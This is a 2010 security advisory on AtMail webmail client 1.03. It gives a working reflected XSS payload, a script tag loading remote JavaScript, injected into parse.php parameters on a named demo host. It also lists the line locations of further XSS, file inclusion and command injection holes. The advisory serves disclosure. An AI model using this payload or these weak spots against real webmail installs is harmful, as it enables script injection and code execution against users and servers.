+===========================================================================================+
+          AtMail  Open source webmail client 1.03   & XSS & Remote Execution Code          +
+===========================================================================================+


Author(s): Ivan Sanchez 

Product: AtMail open source webmail client 1.03


Web: http://atmail.com/   http://atmail.org/


Versions: 1.03 (last version)


Date: 20/06/2010


Vendor: Informed trough web form 19-06-2010



Information:


http://atmail.com/contact.php

atMail proudly serves various organizations, including leading ISPs, Portals, small to medium business 
and prestigious educational and government clients. The AtMail software powers over 10 million email accounts worldwide, 
used by people on a daily basis for their critical email communication. We serve over 4,000 paying customers from around 70 countries, 
to deliver one of the best integrated Webmail and Email-server solutions on the market.



GOOGLE DORKS:
------------

n/a



Evil Function:  
--------------

PARSE.PHP

http://demo.atmail.org/parse.php?file=html/LANG/simple/showmail_interface.html&ajax=1&func= 
http://demo.atmail.org/parse.php?file=



Internal Variables without Controls:
------------------------------------

FILE
FUNC



Exploiting:
--------------

Insert and assign the evil code to these variables,then import the malicious java as you want!
I have replaced some URL's to avoid something ;-)


EVIL CODE=  "><script src=http://site/evil.js></script>

http://demo.atmail.org/parse.php?file=html/LANG/simple/showmail_interface.html&ajax=1&func= EVIL CODE
http://demo.atmail.org/parse.php?file=  EVIL CODE





More files affected with differents types of holes:

---------------------------------------------------

Reflected XSS:
--------------

Line 412 of showmail.php sends unvalidated data to a web browser, which can result in the browser executing malicious code.
Line 189 of showmail.php sends unvalidated data to a web browser, which can result in the browser executing malicious code.
Line 844 of showmail.php sends unvalidated data to a web browser, which can result in the browser executing malicious code.



File Inclusion:
---------------

The file index.php passes an unvalidated filename to a dynamic include statement on line 131. Allowing unvalidated user input to to control files that are included dynamically in PHP can lead to malicious code execution.



Command Injection:
-------------------

Line 47 in step6.php calls shell_exec() with a command built from untrusted data. This call can cause the program to execute malicious commands on behalf of an attacker.







To conclude, I could find  a lot of  issues regarding  SLQ Injection, and other dangerous holes.





        NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!


+===========================================================================================+
+          AtMail  Open source webmail client 1.03   & XSS & Remote Execution Code          +
+===========================================================================================+